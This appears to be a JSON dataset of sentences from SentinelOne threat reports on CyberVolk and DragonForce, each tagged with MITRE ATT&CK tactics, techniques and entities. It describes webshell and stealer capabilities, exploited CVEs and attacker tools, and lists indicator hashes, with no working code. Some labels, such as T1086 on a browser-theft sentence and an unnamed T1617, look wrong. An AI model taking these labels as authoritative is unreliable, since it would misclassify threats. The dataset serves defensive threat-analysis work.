"TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Allows uploading, renaming, and downloading files via the webshell.", "entities": [ { "text": "webshell", "start": 27, "end": 35, "label": "MalwareTool" }, { "text": "allows for files to be uploaded, renamed, and downloaded", "start": 36, "end": 92, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s90-037dc5", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "The current version of the webshell allows for files to be uploaded, renamed, and downloaded.", "sentence_text": "Further, attackers can traverse directories on the target server and gather environmental details.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" }, { "id": "T1617", "name": "" } ], "procedure": "Directory traversal and environment reconnaissance on target server", "entities": [ { "text": "attackers", "start": 9, "end": 18, "label": "ThreatActor" }, { "text": "traverse directories ", "start": 23, "end": 44, "label": "Action" }, { "text": "gather environmental details", "start": 69, "end": 97, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s91-287a8c", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "Further, attackers can traverse directories on the target server and gather environmental details.", "sentence_text": "Specifically, CyberVolk is derived from the LBX-Grabber component.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "CyberVolk malware development based on LBX-Grabber component", "entities": [ { "text": "CyberVolk", "start": 14, "end": 23, "label": "MalwareTool" }, { "text": "LBX-Grabber", "start": 44, "end": 55, "label": "MalwareTool" }, { "text": "derived from the LBX-Grabber", "start": 27, "end": 55, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s92-edc0e6", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 92, "context_before": "Specifically, CyberVolk is derived from the LBX-Grabber component.", "sentence_text": "CyberVolk Stealer attempts to gather various types of data from the system, then exfiltrates the data via Discord.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Collect and exfiltrate data using CyberVolk Stealer via Discord", "entities": [ { "text": "CyberVolk Stealer", "start": 0, "end": 17, "label": "MalwareTool" }, { "text": "Discord.", "start": 106, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "gather various types of data from the system", "start": 30, "end": 74, "label": "Action" }, { "text": "exfiltrates the data via Discord.", "start": 81, "end": 114, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s93-06eb8a", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "CyberVolk Stealer attempts to gather various types of data from the system, then exfiltrates the data via Discord.", "sentence_text": "Version 1 of the stealer was announced in September 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s94-d93f18", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "Version 1 of the stealer was announced in September 2024.", "sentence_text": "The stealer targets multiple browsers and numerous wallets.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1086", "name": "PowerShell" } ], "procedure": "Target browsers and crypto wallets", "entities": [ { "text": " stealer", "start": 3, "end": 11, "label": "MalwareTool" }, { "text": "targets multiple browsers and numerous wallets", "start": 12, "end": 58, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s95-83fa01", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 95, "context_before": "The stealer targets multiple browsers and numerous wallets.", "sentence_text": "The last significant posts to the CyberVolk Telegram channels were on November 3, 2024.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Posting on Telegram channels", "entities": [ { "text": "CyberVolk", "start": 34, "end": 43, "label": "ThreatActor" }, { "text": "CyberVolk Telegram ", "start": 34, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "posts", "start": 21, "end": 26, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s96-8970a8", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 96, "context_before": "The last significant posts to the CyberVolk Telegram channels were on November 3, 2024.", "sentence_text": "Telegram channels belonging to CyberVolk and numerous allies appear to have been banned maliciously.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s97-1f7b78", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 97, "context_before": "Telegram channels belonging to CyberVolk and numerous allies appear to have been banned maliciously.", "sentence_text": "We have observed specific actors claiming responsibility for attempting to close and/or extort channels belonging to AzzaSec and DoubleFace amongst others.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "Threat actors attempt to shut down or extort communication channels associated with other groups.", "entities": [ { "text": "specific actors", "start": 17, "end": 32, "label": "ThreatActor" }, { "text": "attempting to close and/or extort channels", "start": 61, "end": 103, "label": "Action" }, { "text": "channels belonging to AzzaSec and DoubleFace", "start": 95, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s98-4514a9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 98, "context_before": "We have observed specific actors claiming responsibility for attempting to close and/or extort channels belonging to AzzaSec and DoubleFace amongst others.", "sentence_text": "This was highlighted in another post on November 13, 2024 in the “Hunt3r Kill3rs” Telegram channel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s99-6d5f30", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 99, "context_before": "This was highlighted in another post on November 13, 2024 in the “Hunt3r Kill3rs” Telegram channel.", "sentence_text": "The post went on to advise others receiving extortion threats to ignore them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s100-cbe510", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 100, "context_before": "The post went on to advise others receiving extortion threats to ignore them.", "sentence_text": "“I’m the only one that is closing the hacktivist community’s channels and groups”, the actor claimed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s101-4bb088", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 101, "context_before": "“I’m the only one that is closing the hacktivist community’s channels and groups”, the actor claimed.", "sentence_text": "This weaponization of the Telegram Terms-of-Service is increasing in parallel with threat actor groups moving off Telegram to seek more clandestine and secure communication channels in response to increased scrutiny and declining trust in the platform after the arrest of Telegram founder Pavel Durov.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Threat actors transition from Telegram to more secure channels in response to scrutiny", "entities": [ { "text": " threat actor groups moving off Telegram to seek more clandestine and secure communication channels", "start": 82, "end": 181, "label": "ThreatActor" }, { "text": "Telegram", "start": 114, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "moving off Telegram to seek more clandestine and secure communication channels", "start": 103, "end": 181, "label": "Action" }, { "text": "weaponization of the Telegram Terms-of-Service", "start": 5, "end": 51, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s102-5893ef", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 102, "context_before": "This weaponization of the Telegram Terms-of-Service is increasing in parallel with threat actor groups moving off Telegram to seek more clandestine and secure communication channels in response to increased scrutiny and declining trust in the platform after the arrest of Telegram founder Pavel Durov.", "sentence_text": "Conclusion\nThe number of ransomware families associated with the CyberVolk hacktivist group highlights the ability of this group to rapidly pivot, building upon existing tools to suit their needs and further their causes.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Adapting and leveraging ransomware tools to suit operational goals", "entities": [ { "text": "CyberVolk hacktivist group", "start": 65, "end": 91, "label": "ThreatActor" }, { "text": "ransomware families ", "start": 25, "end": 45, "label": "MalwareTool" }, { "text": "rapidly pivot, building upon existing tools to suit their needs", "start": 132, "end": 195, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s103-01a596", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 103, "context_before": "Conclusion\nThe number of ransomware families associated with the CyberVolk hacktivist group highlights the ability of this group to rapidly pivot, building upon existing tools to suit their needs and further their causes.", "sentence_text": "Though primarily composed of lower-skilled threat actors that reach for and use whatever works for them, we continue to see how quickly the group is able to move and adapt.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Rapid adaptation and use of opportunistic tools", "entities": [ { "text": " the group", "start": 135, "end": 145, "label": "ThreatActor" }, { "text": "whatever works for them", "start": 80, "end": 103, "label": "MalwareTool" }, { "text": "move and adapt.", "start": 157, "end": 172, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s104-2d6383", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 104, "context_before": "Though primarily composed of lower-skilled threat actors that reach for and use whatever works for them, we continue to see how quickly the group is able to move and adapt.", "sentence_text": "The reuse of tools like AzzaSec Ransom, Diamond RW, and even more established ones like LockBit and Chaos, demonstrates just how dynamic these affiliations and alliances between hacktivist groups can be.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Reuse of ransomware tools to support group operations", "entities": [ { "text": "hacktivist groups", "start": 178, "end": 195, "label": "ThreatActor" }, { "text": "AzzaSec Ransom, Diamond RW", "start": 24, "end": 50, "label": "MalwareTool" }, { "text": "LockBit and Chaos,", "start": 88, "end": 106, "label": "MalwareTool" }, { "text": "reuse of tools", "start": 4, "end": 18, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s105-0a18f1", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 105, "context_before": "The reuse of tools like AzzaSec Ransom, Diamond RW, and even more established ones like LockBit and Chaos, demonstrates just how dynamic these affiliations and alliances between hacktivist groups can be.", "sentence_text": "Not only are such groups touting new tools within short time frames only to abandon them and pivot to something else later, the number of hacktivist groups is also growing.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Rapid adoption, abandonment, and pivoting of tools by hacktivist groups", "entities": [ { "text": " such groups", "start": 12, "end": 24, "label": "ThreatActor" }, { "text": "hacktivist groups", "start": 138, "end": 155, "label": "ThreatActor" }, { "text": "new tools", "start": 33, "end": 42, "label": "MalwareTool" }, { "text": "touting", "start": 25, "end": 32, "label": "Action" }, { "text": "to abandon", "start": 73, "end": 83, "label": "Action" }, { "text": "pivot to something else later", "start": 93, "end": 122, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s106-b74338", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 106, "context_before": "Not only are such groups touting new tools within short time frames only to abandon them and pivot to something else later, the number of hacktivist groups is also growing.", "sentence_text": "Ransomware operations will only get muddier and increase how much cybersecurity teams will need to monitor in order to stay up to date on the happenings within the cybercrime ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s107-b6c330", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 107, "context_before": "Ransomware operations will only get muddier and increase how much cybersecurity teams will need to monitor in order to stay up to date on the happenings within the cybercrime ecosystem.", "sentence_text": "Indicators of Compromise CyberVolk 0ce59e479ec6eacd3a44ed3de2dc572676e5b2dd", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s108-074aae", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 108, "context_before": "Indicators of Compromise CyberVolk 0ce59e479ec6eacd3a44ed3de2dc572676e5b2dd", "sentence_text": "16bf55122bbb6073cc1d77ce23e2a8e6052f9ec1 | Stealer 3bf6a90017bf22083ab735ecf3f8589a3f220e53 | Ransom note 5d8bed459f55a37e2fcb801d04de337a01c5d623 | Ransom note 813c510fb2463ecc6dff7795ef96744ca82544b3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s109-d8a7c9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 109, "context_before": "16bf55122bbb6073cc1d77ce23e2a8e6052f9ec1 | Stealer 3bf6a90017bf22083ab735ecf3f8589a3f220e53 | Ransom note 5d8bed459f55a37e2fcb801d04de337a01c5d623 | Ransom note 813c510fb2463ecc6dff7795ef96744ca82544b3", "sentence_text": "| Webshell b958fb7241cc9675b8dd967b02df6a6ad92de52d c70d2350cbac3d0abeb896adcce2fcf243943633", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s110-299260", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 110, "context_before": "| Webshell b958fb7241cc9675b8dd967b02df6a6ad92de52d c70d2350cbac3d0abeb896adcce2fcf243943633", "sentence_text": "| Webshell eae366ee4a7c19a87bc5ab9360f4333907a6a387 f5d0c94b2be91342dc01ecf2f89e7e6f21a74b90 AzzaSec 5499da31260a4aa75eea46c1d4aa6559074749a8 | Ransomware (src)\nInvisible / Doubleface Team 197d5c9c5cbf53ed3e78d53a008b6ad665fa3e4c 1f325950a7a8e1a2050e954f33d2c3774510bd6e", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s111-a32f2c", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 111, "context_before": "| Webshell eae366ee4a7c19a87bc5ab9360f4333907a6a387 f5d0c94b2be91342dc01ecf2f89e7e6f21a74b90 AzzaSec 5499da31260a4aa75eea46c1d4aa6559074749a8 | Ransomware (src)\nInvisible / Doubleface Team 197d5c9c5cbf53ed3e78d53a008b6ad665fa3e4c 1f325950a7a8e1a2050e954f33d2c3774510bd6e", "sentence_text": "59e293623e4fb828a29fb982d5ac9a4f993abc3b d35da3f4e36eebf36a130bc7e0182fc4c35cf551 | Archive HexaLocker 11288fb54c6f2ed4d8cddfb004c754e5e9c35ad5 4c24fdf504af452fb7245db33bfc1dc4f72c04a8 4f8e1e7bfd484cf312fdc77e8687086f6f6007c 7ba4eb7842730bbc82fc129a3f3d4a239ac436c2 84dacf9da57d9d69c2ca711831895bf185834b8c 904f46ef4c66ccf844bf31d37c11298fb7f65157 93334882ff3c03c42b1179d9db0c165c99145369 a4b7ef2ca1d5fda318505cac6757b5313b47eeac b6a9c5692b76f2defc1c170bdce0e41d91d706db be581fc1f430dd6855effd9e54429c5c5fcb9f8c | Ransom note cd8f934fa7ba7817bb62f0e4b968b3f124355b60 PDBs C:/Users/zzart/Desktop/HexaLocker RaaS/crypter.go C:/Users/zzart/Desktop/MalwareDeveloppement/HexaLocker RaaS/decrypt_key.go C:/Users/zzart/Desktop/MalwareDeveloppement/HexaLocker RaaS/crypterV1.go DNS darkslategray-baboon-853641[.]hostingersite[.]com LAPSUS$/HexaLocker", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s112-834823", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 112, "context_before": "59e293623e4fb828a29fb982d5ac9a4f993abc3b d35da3f4e36eebf36a130bc7e0182fc4c35cf551 | Archive HexaLocker 11288fb54c6f2ed4d8cddfb004c754e5e9c35ad5 4c24fdf504af452fb7245db33bfc1dc4f72c04a8 4f8e1e7bfd484cf312fdc77e8687086f6f6007c 7ba4eb7842730bbc82fc129a3f3d4a239ac436c2 84dacf9da57d9d69c2ca711831895bf185834b8c 904f46ef4c66ccf844bf31d37c11298fb7f65157 93334882ff3c03c42b1179d9db0c165c99145369 a4b7ef2ca1d5fda318505cac6757b5313b47eeac b6a9c5692b76f2defc1c170bdce0e41d91d706db be581fc1f430dd6855effd9e54429c5c5fcb9f8c | Ransom note cd8f934fa7ba7817bb62f0e4b968b3f124355b60 PDBs C:/Users/zzart/Desktop/HexaLocker RaaS/crypter.go C:/Users/zzart/Desktop/MalwareDeveloppement/HexaLocker RaaS/decrypt_key.go C:/Users/zzart/Desktop/MalwareDeveloppement/HexaLocker RaaS/crypterV1.go DNS darkslategray-baboon-853641[.]hostingersite[.]com LAPSUS$/HexaLocker", "sentence_text": "481830db2daf40607748bd9624e970781e7f4408 e1d8993ef4bbc8d2aa331262e5422d91865acc4f Parano 3ce26f45f5da58ab75b4d1cecc78c3bbe275f708 | Stealer (archive)\n4581b30e6f5946a570963cd76dc79beaa8bcf1c3 | ScreenLocker 91abb7fadf847f3810bbe0734e3c31d5dc7bce6d | ScreenLocker", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s113-8008d6", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 113, "context_before": "481830db2daf40607748bd9624e970781e7f4408 e1d8993ef4bbc8d2aa331262e5422d91865acc4f Parano 3ce26f45f5da58ab75b4d1cecc78c3bbe275f708 | Stealer (archive)\n4581b30e6f5946a570963cd76dc79beaa8bcf1c3 | ScreenLocker 91abb7fadf847f3810bbe0734e3c31d5dc7bce6d | ScreenLocker", "sentence_text": "b5d8e690a75f07e7d3e18fcc5b86bfe2362a3300 | ScreenLocker Hacktivism Share Jim Walter Jim Walter is a Senior Threat Researcher at SentinelOne focusing on evolving trends, actors, and tactics within the thriving ecosystem of cybercrime and crimeware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s114-945ba5", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 114, "context_before": "b5d8e690a75f07e7d3e18fcc5b86bfe2362a3300 | ScreenLocker Hacktivism Share Jim Walter Jim Walter is a Senior Threat Researcher at SentinelOne focusing on evolving trends, actors, and tactics within the thriving ecosystem of cybercrime and crimeware.", "sentence_text": "He specializes in the discovery and analysis of emerging cybercrime \"services\" and evolving communication channels leveraged by mid-level criminal organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s115-73d8d2", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 115, "context_before": "He specializes in the discovery and analysis of emerging cybercrime \"services\" and evolving communication channels leveraged by mid-level criminal organizations.", "sentence_text": "Jim joined SentinelOne following ~4 years at a security start-up, also focused on malware research and organized crime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s116-e9574a", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 116, "context_before": "Jim joined SentinelOne following ~4 years at a security start-up, also focused on malware research and organized crime.", "sentence_text": "Previously, he spent over 17 years at McAfee/Intel running their Threat Intelligence and Advanced Threat Research teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s1-948350", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "In this post, we offer a high-level overview of the DragonForce group, discuss its targeting, initial access methods, and payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s2-8beea5", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "In this post, we offer a high-level overview of the DragonForce group, discuss its targeting, initial access methods, and payloads.", "sentence_text": "We further provide a comprehensive list of indicators and defensive recommendations to help security teams and threat hunters better protect their organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s3-fa9d56", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "We further provide a comprehensive list of indicators and defensive recommendations to help security teams and threat hunters better protect their organizations.", "sentence_text": "Background\nDragonForce ransomware operations emerged in August 2023, primarily out of Malaysia (DragonForce Malaysia).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s4-2ddb46", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Background\nDragonForce ransomware operations emerged in August 2023, primarily out of Malaysia (DragonForce Malaysia).", "sentence_text": "The group originally positioned itself as a Pro-Palestine hacktivist-style operation; however, over time their goals have shifted and expanded.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s5-f32509", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "The group originally positioned itself as a Pro-Palestine hacktivist-style operation; however, over time their goals have shifted and expanded.", "sentence_text": "The group is also known to heavily target law firms and medical practices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s6-f18a09", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "The group is also known to heavily target law firms and medical practices.", "sentence_text": "Some components of the UK retail attacks have been attributed to an individual affiliated with the loose threat actor collective ‘The Com’, with claims that members are leveraging DragonForce ransomware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s7-0cdd92", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "Some components of the UK retail attacks have been attributed to an individual affiliated with the loose threat actor collective ‘The Com’, with claims that members are leveraging DragonForce ransomware.", "sentence_text": "Our assessment indicates that the affiliate in question exhibits behavioral and operational characteristics consistent with those previously associated with The Com.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s8-0cfae3", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "Our assessment indicates that the affiliate in question exhibits behavioral and operational characteristics consistent with those previously associated with The Com.", "sentence_text": "Initial Access Methods Initial access is typically gained via phishing email along with exploitation of known vulnerabilities; alternatively, attackers may leverage leaked or stolen credentials to access internet-facing devices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Initial access via phishing, vulnerability exploitation, or stolen credentials", "entities": [ { "text": "attackers", "start": 142, "end": 151, "label": "ThreatActor" }, { "text": "internet-facing devices.", "start": 204, "end": 228, "label": "Infrastructure_Indicator" }, { "text": "gained via phishing email", "start": 51, "end": 76, "label": "Action" }, { "text": "exploitation of known vulnerabilities", "start": 88, "end": 125, "label": "Action" }, { "text": "leverage leaked or stolen credentials", "start": 156, "end": 193, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s9-063fc4", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "Initial Access Methods Initial access is typically gained via phishing email along with exploitation of known vulnerabilities; alternatively, attackers may leverage leaked or stolen credentials to access internet-facing devices.", "sentence_text": "Cobalt Strike and other COTS tools are used for campaign management, including the execution of additional payloads and implants.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Use of Cobalt Strike and COTS tools for campaign management and payload execution", "entities": [ { "text": "Cobalt Strike and other COTS tools", "start": 0, "end": 34, "label": "MalwareTool" }, { "text": "used for campaign management", "start": 39, "end": 67, "label": "Action" }, { "text": "execution of additional payloads and implants", "start": 83, "end": 128, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s10-4f0363", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "Cobalt Strike and other COTS tools are used for campaign management, including the execution of additional payloads and implants.", "sentence_text": "The DragonForce operators also utilize tools like mimikatz, Advanced IP Scanner, PingCastle, and a plethora of Remote Management tools to drill further into victim environments, ensuring both elevated privileges and persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" }, { "id": "T1010", "name": "Application Window Discovery" }, { "id": "T1053", "name": "Scheduled Task/Job" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Use of multiple tools to escalate privileges and establish persistence in victim environments", "entities": [ { "text": "DragonForce operators", "start": 4, "end": 25, "label": "ThreatActor" }, { "text": "mimikatz, Advanced IP Scanner, PingCastle, and a plethora of Remote Management tools", "start": 50, "end": 134, "label": "MalwareTool" }, { "text": "drill further into victim environments, ensuring both elevated privileges and persistence.", "start": 138, "end": 228, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s11-520c69", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "The DragonForce operators also utilize tools like mimikatz, Advanced IP Scanner, PingCastle, and a plethora of Remote Management tools to drill further into victim environments, ensuring both elevated privileges and persistence.", "sentence_text": "The group also heavily targets RDP services with credential stuffing attacks and VPN weaknesses to gain initial access into systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1110", "name": "Brute Force" } ], "procedure": "Threat actor targets RDP services using credential stuffing and VPN weaknesses to gain initial access.", "entities": [ { "text": "The group", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "RDP services", "start": 31, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "VPN", "start": 81, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "targets RDP services with credential stuffing attacks and VPN weaknesses to gain initial access", "start": 23, "end": 118, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s12-3abc93", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "The group also heavily targets RDP services with credential stuffing attacks and VPN weaknesses to gain initial access into systems.", "sentence_text": "The following vulnerabilities have specifically been associated with past DragonForce intrusions:\nCVE-2021-44228 – Apache Log4j2 Remote Code Execution (“Log4Shell”)\nCVE-2023-46805 –", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s13-f6b291", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "The following vulnerabilities have specifically been associated with past DragonForce intrusions:\nCVE-2021-44228 – Apache Log4j2 Remote Code Execution (“Log4Shell”)\nCVE-2023-46805 –", "sentence_text": "Ivanti Connect Secure and Policy Secure Authentication Bypass CVE-2024-21412 – Microsoft Windows SmartScreen Security Feature Bypass CVE-2024-21887 – Ivanti Connect Secure and Policy Secure Command Injection CVE-2024-21893 – Ivanti Connect Secure and Policy Secure Path Traversal Additionally, DragonForce operators have been observed deploying the SystemBC backdoor for persistence.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" }, { "id": "T1203", "name": "Exploitation for Client Execution" }, { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "Exploitation of multiple vulnerabilities in Ivanti Connect Secure/Policy Secure and Windows SmartScreen, and deployment of SystemBC backdoor for persistence", "entities": [ { "text": "DragonForce", "start": 294, "end": 305, "label": "ThreatActor" }, { "text": "SystemBC", "start": 349, "end": 357, "label": "Infrastructure_Indicator" }, { "text": "Ivanti Connect Secure", "start": 0, "end": 21, "label": "Infrastructure_Indicator" }, { "text": "Policy Secure", "start": 26, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Windows SmartScreen", "start": 79, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "Authentication Bypass", "start": 40, "end": 61, "label": "Action" }, { "text": "Security Feature Bypass", "start": 109, "end": 132, "label": "Action" }, { "text": "Command Injection ", "start": 190, "end": 208, "label": "Action" }, { "text": "Path Traversal", "start": 265, "end": 279, "label": "Action" }, { "text": "deploying the SystemBC backdoor for persistence.", "start": 335, "end": 383, "label": "Action" } ] }, { 